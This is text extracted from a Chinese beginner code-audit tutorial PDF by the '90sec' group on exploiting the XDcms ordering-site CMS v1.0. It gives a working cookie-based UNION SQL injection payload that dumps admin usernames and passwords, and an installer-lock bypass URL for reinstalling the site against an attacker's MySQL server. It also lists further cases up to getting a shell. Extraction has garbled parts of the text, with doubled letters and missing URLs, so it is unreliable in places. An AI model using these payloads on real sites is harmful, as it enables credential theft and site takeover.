实例分析讲解为您敲开代码审计大门精选.pdf

实例分析讲解为您敲开代码审计大门 90sec 代码审计小组出品 前 言 90sec 为了促进交流建立了N 个兴趣小组。90sec 代码审计小组 因此诞生了， 小组商议给出一部代码审计的入门级实例讲解教程，让新手基友能更快的找到兴奋点，让老 鸟也找一下温存。嘎嘎。。。。。。。 分析目标 XDcms 订餐网站系统 v1.0 XDcms XDcms XXDDccmmss订餐网站管理系统，主要使用Php+Mysql+Smarty 技术基础进行开发，采用OOP（面向对象）方 式进行基础运行框架搭建，集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成 订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功 能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的 PHP类订餐网站系统之一，XDcms 在不断提升用户服务、提高产品质量的同时更加注重用户体验。从系统研发至今，历经了数百次的更新修 改后，网站的架设与管理变得更加轻松及便捷。 官网：/ 下载地址：/dccms/v1.0/sys/xdcms_dc_v1.0.zip 您将学习到的案例有 1、COOKIES 注入代码分析与漏洞利用(利用工具的使用)； 2、全局变量的覆盖代码分析与漏洞利用； 3、后台任意源码读取； 4、本地包含代码分析与漏洞利用； 5、后台getshell 代码分析 与利用； 6、利用二次漏洞拿shell。 1 1 案例11 COOKIES 注入分析 （为了方便区别代码部分采用贴图，实例代码请大家自己下载源码查 看） 文件：/ system/modules/member/index.php 代码： $userid=$_COOKIE[member_userid]; //用$_COOKIE 接收，未做任何过滤 $info=$this-mysql-get_one(select * from .DB_PRE.member where `userid`=$userid); //直接带入到sql 中查询。没有单引号不用考虑GPC 利用工具： 火狐浏览器 + EDIT COOKIES 插件(下载地址请百度) / / 利用方法//步骤： 1、/index.php?m=memberf=register 随便注册一个账号并登录； 2、/index.php?m=memberf=edit 进入资料管理页面 3、在浏览器上选择工具 - EDIT COOKIES 插件打开 因为是本地测试所以IP 地址为 找到member_userid - 点 EDIT 进行编辑 语句：-6 Union seLect 1,2,username,4,5,6,7,8,9,10,11,12,password,14,15 fRom c_admin -6 这个6 是你的ID 然后刷新一下直接爆出管理员密码 前几天发的那个今天发现管理员修补了，可是管理员这补的根没补是一样的。 案例二 全局变量的覆盖 文件：/ install/index.php 代码： 代码的意思是把传入的变量数组遍历赋值,比如 $_GET[‘a’] 赋值为 $a Ok 继续往下看 传入一个insLockfile 判断是否存在。问题在这 利用方法：/install/index.php?insLockfile=1 ( 官网演示之) 将直接跳过判断进行安装。 此时安装的sql 数据库文件会记录在 /data/config.inc.php 利用poc:找到可外连的 mysql (自己去爆破) 直接访问此地址 insLockfile=1 localhost insLockfile=1 localhost /install/index.php?iinnssLLoocckkffiillee==11step=4dbhost=llooccaallhhoossttdbname= xdcms root c_ gbk